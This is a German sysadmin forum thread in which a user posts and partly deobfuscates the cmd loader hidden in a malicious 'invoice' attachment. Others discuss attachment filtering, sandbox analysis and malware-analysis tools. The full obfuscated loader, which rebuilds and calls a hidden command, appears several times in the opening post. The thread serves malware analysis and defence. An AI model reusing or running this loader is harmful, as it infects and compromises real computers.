Office365 Trojaner Analyse
Liebe Community,
ich wende mich an euch, um mehr über den Office365 Trojaner zu erfahren, welcher grade seine Runden durch die Unternehmen zieht.
Mitarbeiter erhalten eine Nachricht mit einer angeblichen Rechnung und darin verbirgt sich die Schadsoftware.
Heise hat dazu einen Beitrag:
https://www.heise.de/security/meldung/Trojaner-Achtung-bei-angeblichen-R ...
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Damit kann erst einmal keiner was Anfangen... Ich habe im weiteren Schritt die Zirkumflex-Zeichen entfernt. Jetzt schaut das ganze etwas besser aus:
Jetzt setze ich einen Zeilenumbruch um es einfach zu lesen:
Wenn ich das in meine Eingabeanfforderung gebe, dann zeigen sich sensible Informationen die nicht unbedingt ausserhalb des Netzwerkes gelangen sollten...
Den hinteren Teil, verstehe ich nicht...
Die Ziffern sind vielleicht im ASCII-Zeichen?
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Lasst uns gemeinsam dieses Rätsel lösen, dann können wir diese Adresse, wenn es eine ist, in unseren Firewalls sperren :D
Mit besten Grüßen
Zeppelin
ich wende mich an euch, um mehr über den Office365 Trojaner zu erfahren, welcher grade seine Runden durch die Unternehmen zieht.
Mitarbeiter erhalten eine Nachricht mit einer angeblichen Rechnung und darin verbirgt sich die Schadsoftware.
Heise hat dazu einen Beitrag:
https://www.heise.de/security/meldung/Trojaner-Achtung-bei-angeblichen-R ...
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
cmd /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&&i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%"
Damit kann erst einmal keiner was Anfangen... Ich habe im weiteren Schritt die Zirkumflex-Zeichen entfernt. Jetzt schaut das ganze etwas besser aus:
cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in (47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%"
cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in
(47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)
do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%"
**cmd /V/C"set** sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in
Den hinteren Teil, verstehe ich nicht...
Die Ziffern sind vielleicht im ASCII-Zeichen?
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Lasst uns gemeinsam dieses Rätsel lösen, dann können wir diese Adresse, wenn es eine ist, in unseren Firewalls sperren :D
Mit besten Grüßen
Zeppelin
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 392899
Url: https://administrator.de/contentid/392899
Ausgedruckt am: 14.11.2024 um 01:11 Uhr
21 Kommentare
Neuester Kommentar
Rein fachlich würde ich mal sagen, daß hier eine Sicherheitslücke in der Windows Shellsprache ausgenutzt wird, und natürlich ist der Code obfuscated, damit darin unerfahrene Leute erstmal nur Müll vermuten.
Eher managementmäßig betrachtet:
euer Filterystem taugt nix, und es kann sein daß Rechner schon infiziert sind und gnade dir Gott wenn einer die Mail oder das Attachment einfach nur aufmacht.
Daß du das Attachment aufgemacht hast, zeigt von ausufernder Naivität, was meinst du denn wofür der Code gemacht wurde? Um von irgendeiner Komponente verschluckt und ausgeführt zu werden um eine andere zu kompromittiereun und dann wirklich Böses zu tun ....
Ich wart nur auf deinen nächsten Post "hilfe wir haben einen Erpressungstrojaner".
Eher managementmäßig betrachtet:
euer Filterystem taugt nix, und es kann sein daß Rechner schon infiziert sind und gnade dir Gott wenn einer die Mail oder das Attachment einfach nur aufmacht.
Daß du das Attachment aufgemacht hast, zeigt von ausufernder Naivität, was meinst du denn wofür der Code gemacht wurde? Um von irgendeiner Komponente verschluckt und ausgeführt zu werden um eine andere zu kompromittiereun und dann wirklich Böses zu tun ....
Ich wart nur auf deinen nächsten Post "hilfe wir haben einen Erpressungstrojaner".
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis" Nun, das DarkNET ist keine Erfingung aus Büchern und wird auch gerne von Kriminellen genutzt. Oder wie war dein Kommentar zu verstehen?
Zitat von @Zeppelin:
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.
Hi,
..ist ne dümmliche Aussage.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Gruß
Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....
..ist ne dümmliche Aussage.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Gruß
Zitat von @nepixl:
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Joar - ich pers. verifiziere händisch nur gepackte Archive. Alles andere filtern die AV's im Hintergrund direkt raus und benachrichtigen mich bei Fund.
*.doc(m) etc. werden sofort gedropt mit der Antwort, dass ausschließlich PDFs zugelassen sind.
¯\_(ツ)_/¯
Hi,
ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.
Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.
@nepixl
@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.
Gruß
Frank
ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.
Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.
@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.
Gruß
Frank
Zum lernen macht es schon Sinn wenn man sich solche Malware mal genauer anschaut, aber die Sicherheit des eigenen Netzwerks kann man damit nicht erhöhen, denn die URLs unterscheiden sich bei jeder Welle, so schnell kann man die Analysen gar nicht durchführen.
Offtopic und meine Meinung:
Das blocken von Dokumententypen ist machbar, ist sinnvoll und ja, es ist unbequem für einige Nutzer, aber es ist durchsetzbar.
Wer das nicht durchsetzen kann, sollte für solche Dateitypen zumindest eine mehrstündige Quarantäne vorsehen und/oder eine Verhaltensanalyse einsetzen, mindestens aber die Benutzer regelmäßig und ordentlich schulen.
Offtopic und meine Meinung:
Das blocken von Dokumententypen ist machbar, ist sinnvoll und ja, es ist unbequem für einige Nutzer, aber es ist durchsetzbar.
Wer das nicht durchsetzen kann, sollte für solche Dateitypen zumindest eine mehrstündige Quarantäne vorsehen und/oder eine Verhaltensanalyse einsetzen, mindestens aber die Benutzer regelmäßig und ordentlich schulen.
Zitat von @Zeppelin:
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com1 oder seine PDF-Tools.
Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....
Moin...
sagte bestimmt auch der Admin des Klinikums-Fürstenfeldbruck!
Fürstenfeldbruck: Malware legt Klinikums-IT komplett lahm
sorry, in meine augen wurde da komplett versagt!
dann lass lieber die User jammern...
Frank
Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....
sagte bestimmt auch der Admin des Klinikums-Fürstenfeldbruck!
Fürstenfeldbruck: Malware legt Klinikums-IT komplett lahm
sorry, in meine augen wurde da komplett versagt!
dann lass lieber die User jammern...
Frank
Moin...
Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
ich halte von Sophos sowiso nix, aber das sowas an der Sophos vorbei kommt, ist nicht normal...
Denke besser mal an eine Anlagen blockierung für bestimmte Dateitypen nach!
Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
nein, selten die Angreifer schleusen Schadsoftware in euer netzwerk, das macht ihr selber!
Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
jetzt werde nicht albern....
und sich mit schadsoftware auseinander zu setzen und deren disassemblierung fehlt mir die zeit.
Frank
Zitat von @Zeppelin:
Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
das ist wichtig...Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
Denke besser mal an eine Anlagen blockierung für bestimmte Dateitypen nach!
Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
nun ja, die gute idee wäre in einem entwickler forum gut aufgehoben, aber wir administratoren blocken sowas gleich am eingang!und sich mit schadsoftware auseinander zu setzen und deren disassemblierung fehlt mir die zeit.
Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.
ein guter ansatz...Frank
Hi Zeppelin,
habe mal ein wenig im Netz gesucht und das hier gefunden:
https://www.hybrid-analysis.com/sample/0672a7057ef39a0e5560f36fc558e8446 ...
Da wird beschrieben, was die Schadsoftware macht.
Viel Spaß beim Lesen und weiter so. Ich finde es gut, dass es Du versuchst, hinter die Funktionsweise solchen Codes zu kommen. Mir fehlt leider immer die Zeit, so was in einer isolierten Umgebung zu testen.
Trapper Tom
habe mal ein wenig im Netz gesucht und das hier gefunden:
https://www.hybrid-analysis.com/sample/0672a7057ef39a0e5560f36fc558e8446 ...
Da wird beschrieben, was die Schadsoftware macht.
Viel Spaß beim Lesen und weiter so. Ich finde es gut, dass es Du versuchst, hinter die Funktionsweise solchen Codes zu kommen. Mir fehlt leider immer die Zeit, so was in einer isolierten Umgebung zu testen.
Trapper Tom